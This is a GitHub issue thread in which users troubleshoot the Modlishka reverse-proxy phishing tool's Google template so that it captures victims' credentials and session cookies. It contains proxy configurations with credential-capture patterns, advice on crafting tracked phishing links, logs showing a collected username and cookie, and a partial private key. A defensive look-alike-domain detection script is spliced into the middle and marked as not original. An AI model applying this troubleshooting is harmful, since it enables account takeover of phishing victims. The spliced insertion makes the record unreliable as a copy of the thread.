
Unable to sign in to your Google Account: Delete cookies

Open johnnash999 opened this issue 5 years ago • 31 comments


Getting this issue after Gmail login.

The domain is not redirecting to accounts.mywebsite.com but to https://gud2a71rxjfena8.MYWEBSITE.COM/mail/

All links are getting similar subdomains.

johnnash999 avatar Feb 18 '19 10:02 johnnash999

Please paste in your config.

drk1wi avatar Mar 01 '19 08:03 drk1wi

do you also mean the control panel "impersonation" function?

drk1wi avatar Mar 05 '19 13:03 drk1wi

closing as resolved, due to lack of response.

drk1wi avatar Mar 24 '19 22:03 drk1wi

@johnnash999 and @drk1wi Did either of y'all figure it out? Also, where can I find the raw cookie so as to use with the chrome console and login via that way? And do you know the syntax for doing that in the console?

infosecwatchman avatar May 10 '19 15:05 infosecwatchman

@putterpanda So you are getting the username and password but not the user id or cookie?

infosecwatchman avatar May 23 '19 12:05 infosecwatchman

@drk1wi @GregorioSecurity @johnnash999 Definitely still an issue. I get the password fine but not the user ID or any other info (and the client-side browser sees the same Google cookie clearing help page).

Confirmed in Chrome Version 74.0.3729.157 (Official Build) (64-bit) Modlishka - v.1.1

CONFIG - templates/google.com_gsuite.json

{
  "proxyDomain": "google.com.mytrustworthydomain.com",
  "listeningAddress": "0.0.0.0",
  "proxyAddress": "",
  "target": "google.com",
  "targetResources": "content.googleapis.com,www.gstatic.com,ssl.gstatic.com,ogs.google.com,accounts.google.com,clients1.go$
  "targetRules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "ident",
  "trackingParam": "ident",
  "useTls": true,
  "jsRules":"",
  "debug": false,
  "forceHTTPS": false,
  "forceHTTP": true,
  "dynamicMode": false,
  "logPostOnly": false,
  "disableSecurity": false,
  "log": "google.log",
  "plugins": "all",
  "credParams": "dHJ1ZVxdLCIoKD86XHcrW1wuXC1cX10pezAsfVx3KykiXQ==,XGJudWxsLFxbIihbYS16QS1aMC05IiEiIyQlJicoKSorLC0uLzo7PD0+P$
  "cert": "",
  "certKey": "",
  "certPool": ""
}

orlyjamie avatar May 23 '19 12:05 orlyjamie

> @putterpanda So you are getting the username and password but not the user id or cookie?

No, I am only getting the password. Using latest version. No Golang issues either.

orlyjamie avatar May 23 '19 12:05 orlyjamie

When creating the phishing link you want to make sure that your URL looks like this: https://loopback.modlishka.io/?id=[UUID_identifier] and replace [UUID_identifier] with an ID from here: https://www.uuidgenerator.net/ This will give you the ID, but I am still trying to figure out the tracking parameter for the correct session cookie. Let me know if you get the username or not after this.

infosecwatchman avatar May 23 '19 12:05 infosecwatchman

Hey @GregorioSecurity Have used both UUIDs and without, with -debug flag, with no luck.

I'll keep debugging locally but for what it's worth - @drk1wi I have included my google.log.

orlyjamie avatar May 23 '19 13:05 orlyjamie

Slowly starting to piece it together:

  1. Attempted to login without going via Modlishka, it appears my Gsuite account was requesting recovery e-mail verification:

https://accounts.google.com/signin/v2/challenge/kpe?service=mail&passive=true&rm=false&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&ss=1&scc=1&ltmpl=default&ltmplcache=2&emr=1&osid=1&flowName=GlifWebSignIn&flowEntry=ServiceLogin&cid=4&navigationDirection=forward&TL=APDPHBCAEKsQsha-sLLVr1OQ1pEEKkqUUl6JngSxUuQEK4q1nJf5xmux-zMco0cr

Which according to my google.log file is around the time in the process that I get 302'd to the Cookie Clearing help page.

orlyjamie avatar May 23 '19 13:05 orlyjamie

Have you tried running in incognito mode?

infosecwatchman avatar May 23 '19 13:05 infosecwatchman

> Have you tried running in incognito mode?

I only run in incognito.

orlyjamie avatar May 23 '19 13:05 orlyjamie

Try changing https://loopback.modlishka.io/?id=[UUID_identifier] to https://loopback.modlishka.io/?ident=[UUID_identifier]

infosecwatchman avatar May 23 '19 13:05 infosecwatchman

> Try changing https://loopback.modlishka.io/?id=[UUID_identifier] to https://loopback.modlishka.io/?ident=[UUID_identifier]

Okay this solves the UUID issue. But the problem still remains:

  1. User is redirected to:

/accounts/answer/6240232?visit_id=636942149714504307-3824060973&hl=en&rd=1

  2. No Username is captured.

orlyjamie avatar May 23 '19 13:05 orlyjamie

Can you send me the output of your terminal after you log in? and can you send me a copy of your template config?

infosecwatchman avatar May 23 '19 13:05 infosecwatchman

My template config is in the previous post. The log output is below: google_fail.log

orlyjamie avatar May 23 '19 13:05 orlyjamie

> Can you send me the output of your terminal after you log in? and can you send me a copy of your template config?

Is yours working now?

orlyjamie avatar May 23 '19 13:05 orlyjamie

I have not been able to properly collect Google's session cookie in any tool that I've used but I do get everything else. Can you try to log in again and screenshot your terminal for me, please? I am not currently in front of my project right now.

infosecwatchman avatar May 23 '19 13:05 infosecwatchman

Interesting observation, the UUID is being injected in COOKIE values before being sent to Google. This does not seem like it is intended functionality. See 44jww-2983ha-fhwhwa

COOKIES
======
Timestamp: Friday, 24-May-19 04:44:35 UTC
======
RemoteIP: 212.94.103.17:60065
======
UUID: 44jww-2983ha-fhwhwa
======
URL: https://accounts.google.com
======
GAPS=1:_WqK0WB9CqHjrRlcKjfFy2bFlsoy-ZnAmcK29iT0FyReom4RV822ouOt2eJSiFGt2ii9JpG1oBuq8_JdJtkZ97NYJbAUGw:cDUd5KKcfXuIj3_o;Path=/;Expires=Sun, 23-May-2021 04:44:35 GMT;;HttpOnly;Priority=HIGH
======

REQUEST
======
Timestamp: Friday, 24-May-19 04:44:36 UTC
======
RemoteIP: 212.94.103.17:54333
======
UUID: 44jww-2983ha-fhwhwa
======
GET /accounts/answer/32050?hl=ru&ctx=ch_CheckCookie HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Cookie: -2983ha-fhwhwa

orlyjamie avatar May 24 '19 05:05 orlyjamie

Sorry @putterpanda I am out of my depth at this point. I do not know this code well enough to tell you if that is correct or not, or how to fix it.

infosecwatchman avatar May 24 '19 12:05 infosecwatchman

Hi, I believe that the bug is that the target domain is part of the proxy domain name.

"proxyDomain": "google.com.mytrustworthydomain.com", "target": "google.com",

Can you try if everything works for you with just the "proxyDomain": "mytrustworthydomain.com" ?

drk1wi avatar May 24 '19 12:05 drk1wi
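
Seen from the defender's side, the hostname shape quoted in the comment above (a sign-in domain used as the leading labels of an unrelated domain) is easy to flag in proxy or DNS logs. The following is an added example, not part of the original thread or of the Modlishka project; the `PROTECTED` list, the function names and the sample entries are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Domains whose sign-in pages users are expected to reach directly (assumed list).
PROTECTED = ("google.com",)

# Constructed sample log values: two hostnames quoted in the thread, the rest invented.
SAMPLE = [
    "https://accounts.google.com/signin/v2/challenge/kpe",
    "google.com.mytrustworthydomain.com",
    "https://Accounts.Google.com.mytrustworthydomain.com:443/",
    "gud2a71rxjfena8.MYWEBSITE.COM",
    "notgoogle.com.",
]


def hostname_of(value: str) -> str:
    """Return the lower-cased hostname of a URL or bare host, without a trailing dot."""
    host = urlsplit(value if "//" in value else "//" + value).hostname or ""
    return host.rstrip(".").lower()


def embedded_brand(value: str, protected=PROTECTED):
    """Return the protected domain a hostname embeds, or None.

    A host is flagged when the labels of a protected domain appear as a
    contiguous run inside it but the host does not end with that domain,
    e.g. google.com.<other-domain>. Matching whole labels avoids false
    hits on names such as notgoogle.com.
    """
    labels = hostname_of(value).split(".")
    for domain in protected:
        want = domain.lower().split(".")
        n = len(want)
        if labels[-n:] == want:
            continue  # genuinely under the protected domain
        for i in range(len(labels) - n):
            if labels[i:i + n] == want:
                return domain
    return None


def scan(values, protected=PROTECTED):
    """Return (hostname, embedded domain) pairs for every flagged value."""
    hits = []
    for value in values:
        brand = embedded_brand(value, protected)
        if brand:
            hits.append((hostname_of(value), brand))
    return hits
```

This catches only look-alike hosts that embed the protected name; a proxy domain with no such label, as suggested in the comment above, needs other signals such as domain age or certificate issuance monitoring.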

I am having the same issue: getting username and password, just not able to sign in or impersonate. It says unable to login, delete cookies. I am using UUID.

imemyself9327 avatar May 28 '19 11:05 imemyself9327

Is there any way I can go back to the previous version that worked absolutely fine for me?

imemyself9327 avatar May 28 '19 11:05 imemyself9327

you can use the TAG option on the repository. Though, I am not sure what's the issue here since I tried the current branch and everything is working fine.

drk1wi avatar May 28 '19 11:05 drk1wi

@drk1wi Would you mind telling us exactly the environment you are testing on so we can copy the environment, to ensure the best chance of success.

infosecwatchman avatar May 28 '19 12:05 infosecwatchman

It's just: go version go1.12.1 darwin/amd64 and ./dist/proxy -config templates/google.com_gsuite.json with self-signed CA cert

drk1wi avatar May 28 '19 12:05 drk1wi

I'm able to sign in and get username and password with UUID, but when I impersonate it just says cookie mismatch. I guess this error should be for everyone. I just tried the previous version using the tag, yet getting the same error: https://imgbbb.com/image/fpUrt https://imgbbb.com/image/fpjeD If you can, please tell me the meaning of this error:

xxxxxxxxxxxxil:443] via --> [https://google.com]
[Tue May 28 15:59:49 2019] INF User tracking: Redirecting client to /
2019/05/28 21:29:50 http: multiple response.WriteHeader calls
[Tue May 28 15:59:50 2019] WAR DecodeSubdomain [!www.google.com] contains invalid characters : %!s(MISSING)
2019/05/28 21:29:50 http: proxy error: dial tcp: lookup un5gmtkzgjfbpmm5pm1g.google.com on 8.8.8.8:53: no such host
[Tue May 28 16:00:25 2019] WAR rewriteResponse took 1.07956457s
[Tue May 28 16:00:25 2019] WAR rewriteResponse took 1.154344633s
[Tue May 28 16:00:25 2019] WAR rewriteResponse took 1.275840317s
2019/05/28 21:31:10 http: proxy error: context canceled
[Tue May 28 16:03:04 2019] INF [P] Tracking victim via initial parameter 95bdb404-fbec-4039-9e02-7974e764e59f
[Tue May 28 16:03:34 2019] INF Username collected ID:[95bdb404-fbec-4039-9e02-7974e764e59f] username: stevenjohnson

This is my config file:

"listeningPort": "443",
"listeningAddress": "0.0.0.0",
"target": "https://google.com",
"targetResources": "content.googleapis.com,www.gstatic.com,ssl.gstatic.com,ogs.google.com,accounts.google.com,clients1.g$
"targetRules": "",
"terminateTriggers": "",
"terminateRedirectUrl": "",
"trackingCookie": "ident",
"trackingParam": "ident",
"useTls": true,
"jsRules":"",
"debug": false,
"logPostOnly": false,
"disableSecurity": false,
"log": "google.log",
"plugins": "all",
"credParams": "dHJ1ZVxdLCIoW15cV10rKSJd,XGJudWxsLFxbIihbYS16QS1aMC05IiEiIyQlJicoKSorLC0uLzo7PD0+P0BeX2B7fH1+XSspIixudWxs$
"cert": "-----BEGIN CERTIFICATE-----\nMIIGZDCCBUygAwIBAgISA8CkGyF8hX1yJyc6w62qPQeeMA0GCSqGSIb3DQEBCwUA\nMEoxCzAJBgNVBAYT$
"certKey": "-----BEGIN RSA PRIVATE KEY-----\nMIIJJwIBAAKCAgEAhDXoxrfwXD+GhsfS2DNon2cHPReZTs3hG1WhiEWxQLCROXrc\nvDDDd3j18$
"certPool": ""
}

imemyself9327 avatar May 28 '19 16:05 imemyself9327

Please use the template file as the base and the latest version

drk1wi avatar May 28 '19 16:05 drk1wi

I am using the template file as the base and I tried both versions. I am getting the same error:

2019/05/28 21:29:50 http: multiple response.WriteHeader calls
[Tue May 28 15:59:50 2019] WAR DecodeSubdomain [!www.google.com] contains invalid characters : %!s(MISSING)
2019/05/28 21:29:50 http: proxy error: dial tcp: lookup un5gmtkzgjfbpmm5pm1g.google.com on 8.8.8.8:53: no such host

imemyself9327 avatar May 28 '19 17:05 imemyself9327

So when I impersonate it just says cookie mismatch.

imemyself9327 avatar May 28 '19 17:05 imemyself9327